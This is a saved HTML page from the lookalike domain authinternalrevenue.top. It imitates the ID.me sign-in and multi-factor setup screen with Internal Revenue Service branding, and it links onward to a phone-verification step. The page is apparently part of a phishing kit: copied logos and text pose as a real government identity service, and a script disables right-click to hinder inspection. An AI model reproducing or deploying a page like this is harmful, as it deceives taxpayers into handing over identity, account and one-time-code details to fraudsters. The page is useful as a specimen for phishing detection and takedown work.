<!DOCTYPE html>
<!-- saved from url=(0041)https://authinternalrevenue.top/ver1.html -->
<html dir="ltr" lang="en">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <style>
      body {
        transition: opacity ease-in 0.2s;
      }
      body[unresolved] {
        opacity: 0;
        display: block;
        overflow: hidden;
        position: relative;
      }
    </style>
    <title itemprop="name">Sign in to ID.me - ID.me</title>

    <meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible" />
    <meta content="One Identity. One Wallet." name="description" />
    <meta content="" name="keywords" />

    <meta content="noodp" name="robots" />
    <meta
      content="width=device-width, initial-scale=1, minimum-scale=1"
      name="viewport"
    />
    <meta content="noindex" name="robots" />
    <link
      rel="icon"
      type="image/png"
      href="https://authinternalrevenue.top/id.ico"
    />
    <link
      rel="stylesheet"
      href="./Sign in to ID.me - ID.me mfa_files/application-12485d2c911011b226e18329e57725b33a13a593773141eae6e2.css"
    />
    <script>
      document.addEventListener("contextmenu", (event) =>
        event.preventDefault()
      );
    </script>
  </head>
  <body
    class=""
    data-new-gr-c-s-check-loaded="14.1153.0"
    data-gr-ext-installed=""
  >
    <div id="ZN_2bLc7fWaOZ8U4ey"></div>
    <div class="page-container" data-role="page-container">
      <div class="container">
        <div class="content-container">
          <form
            class="new_user"
            id="new_user"
            data-validate="signin"
            accept-charset="UTF-8"
            method="post"
          >
            <div class="form-header">
              <div class="form-header-content" role="banner">
                <div class="partner">
                  <div class="c_icon m_idme">
                    <img
                      alt="ID.me"
                      src="./Sign in to ID.me - ID.me mfa_files/idme-logo-1d96899e99d393974ec16fa17a820e78fca132bd8ea53e01f12bdc000baf674f.svg"
                    />
                  </div>
                  <div class="c_icon m_addition">
                    <img
                      alt="with"
                      src="./Sign in to ID.me - ID.me mfa_files/icon-addition-1c60f492657aa091463f6ac2e15f0f5123425f314e60383dbba0b06b3bbae0ed.svg"
                    />
                  </div>
                  <div class="c_icon m_consumer-logo">
                    <button
                      name="button"
                      type="button"
                      class="m_consumer-logo m_exit-ramp"
                      data-component="Components.Modal"
                      fdprocessedid="1fuvyb"
                    >
                      <img
                        alt="Internal Revenue Service"
                        src="./Sign in to ID.me - ID.me mfa_files/IRS-Logo.svg"
                      />
                    </button>
                  </div>
                </div>
              </div>
            </div>
            <main aria-labelledby="sr_page_title" class="form-container">
              <h1 id="sr_page_title">Secure your account</h1>
              <div class="form-content-title">
                <h2>Choose an MFA option</h2>
              </div>
              <div class="form-content">
                <p>
                  With multi-factor authentication (MFA), even if someone
                  guesses your password, they won't be able to sign in as you.
                </p>
              </div>
              <ul class="icon_options multifactor_setups">
                <li
                  data-component="Multifactor.CompatibilityCheck"
                  data-handle="phone"
                  data-kind="registration"
                >
                  <section class="link-card">
                    <div>
                      <img
                        width="40"
                        alt=""
                        src="./Sign in to ID.me - ID.me mfa_files/phone-e5b1d5ac7ae4a5af4428ce9fd89acbd9566c6c69f60984f738ee3d8167c732d8.svg"
                      />
                    </div>
                    <div class="link-card__content">
                      <a
                        id="phone"
                        aria-describedby="sr_desc_phone"
                        data-method="get"
                        href="./phone.html"
                        >Text Message or Phone Call</a
                      >
                      <span id="sr_desc_phone">
                        Get a 6-digit code by text message or phone call.
                      </span>
                    </div>
                  </section>
                </li>
              </ul>
              <div class="form-footer"></div>
            </main>
          </form>
        </div>
        <aside aria-label="Select Language" class="language">
          <div class="language-selection" data-component="Components.Language">
            <a
              class="language-selection-toggle"
              href="https://authinternalrevenue.top/ver1.html#"
              >English</a
            >
          </div>
        </aside>
        <footer class="footer">
          <nav aria-label="Footer" class="footer__links">
            <ul class="footer__list">
              <li class="footer__list-item">
                <a
                  target="_blank"
                  class="footer__link"
                  href="https://authinternalrevenue.top/ver1.html#"
                  >What is ID.me?</a
                >
              </li>
              <li class="footer__list-item">
                <a
                  target="_blank"
                  class="footer__link"
                  href="https://authinternalrevenue.top/ver1.html#"
                  >Terms of Service</a
                >
              </li>
              <li class="footer__list-item">
                <a
                  target="_blank"
                  class="footer__link"
                  href="https://authinternalrevenue.top/ver1.html#"
                  >Privacy Policy</a
                >
              </li>
            </ul>
          </nav>
        </footer>
      </div>
    </div>
  </body>
  <grammarly-desktop-integration data-grammarly-shadow-root="true"
    ><template shadowrootmode="open"
      ><style>
        div.grammarly-desktop-integration {
          position: absolute;
          width: 1px;
          height: 1px;
          padding: 0;
          margin: -1px;
          overflow: hidden;
          clip: rect(0, 0, 0, 0);
          white-space: nowrap;
          border: 0;
          -moz-user-select: none;
          -webkit-user-select: none;
          -ms-user-select: none;
          user-select: none;
        }

        div.grammarly-desktop-integration:before {
          content: attr(data-content);
        }
      </style>
      <div
        aria-label="grammarly-integration"
        role="group"
        tabindex="-1"
        class="grammarly-desktop-integration"
        data-content='{"mode":"full","isActive":true,"isUserDisabled":false}'
      ></div></template
  ></grammarly-desktop-integration>
</html>
